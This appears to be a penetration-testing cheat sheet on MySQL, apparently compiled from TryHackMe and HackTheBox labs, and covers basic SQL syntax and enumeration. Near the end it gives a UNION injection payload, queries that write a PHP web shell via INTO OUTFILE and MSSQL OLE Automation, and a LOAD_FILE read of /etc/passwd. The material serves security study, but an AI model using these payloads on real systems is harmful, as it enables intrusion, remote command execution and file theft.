MySQL
MySQL default system schemas/databases:
mysql- is the system database that contains tables that store information required by the MySQL serverinformation_schema- provides access to database metadataperformance_schema- is a feature for monitoring MySQL Server execution at a low levelsys- a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
mysql -h 10.10.97.109 -u root -p
mysql -h 10.10.97.109 -u root -pPassword123show databases;Tryhackme - network services 2
mysql -u root -pIf you're already in the box
SHOW GRANTS FOR 'u1'@'localhost';
https://dev.mysql.com/doc/refman/8.0/en/show-grants.htmlmysql -u root -h docker.hackthebox.eu -P 3306 -p show databases;
use "database name";
show tables;
SELECT * FROM table_name;
Describe table_name;INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02');
INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');
DROP TABLE logins;
ALTER TABLE logins ADD newColumn INT;
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;
ALTER TABLE logins MODIFY oldColumn DATE;
ALTER TABLE logins DROP oldColumn;
UPDATE logins SET password = 'change_password' WHERE id > 1;SELECT * FROM logins ORDER BY password;
SELECT * FROM logins ORDER BY password DESC;
SELECT * FROM logins ORDER BY password DESC, id ASC;
SELECT * FROM logins LIMIT 2;
SELECT * FROM logins LIMIT 1, 2;
SELECT * FROM logins WHERE id > 1;
SELECT * FROM logins where username = 'admin';
SELECT * FROM logins WHERE username LIKE 'admin%';
SELECT * FROM logins WHERE username like '___';
select first_name,hire_date from employees where first_name like 'Bar%' and hire_date = '1990-01-01';SELECT 1 = 1 AND 'test' = 'test';
= 1
SELECT 1 = 1 AND 'test' = 'abc';
= 0
SELECT 1 = 1 OR 'test' = 'abc';
= 1
SELECT 1 = 2 OR 'test' = 'abc';
= 0
SELECT NOT 1 = 1;
= 0
SELECT NOT 1 = 2;
= 1
SELECT 1 = 1 && 'test' = 'abc';
= 0
SELECT 1 = 1 || 'test' = 'abc';
= 1
SELECT 1 != 1;
= 0
SELECT * FROM logins WHERE username != 'john';
SELECT * FROM logins WHERE username != 'john' AND id > 1;# This will return the tables users from my_database
SELECT * FROM my_database.users;
# This will return database names from the database metadata
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -SHOW VARIABLES LIKE 'secure_file_priv';
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
SELECT * from users INTO OUTFILE '/tmp/test.txt';
> linux = cat /tmp/test.txt
> linux = ls -la /tmp/test.txt (Will be owned by mysql)
# Will create a php shell exec in www directory
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';# OLE Automation Procedures
# Enabling the OLE
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO
# Creating a file
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO# It will read the /etc/passwd
select LOAD_FILE("/etc/passwd");Last updated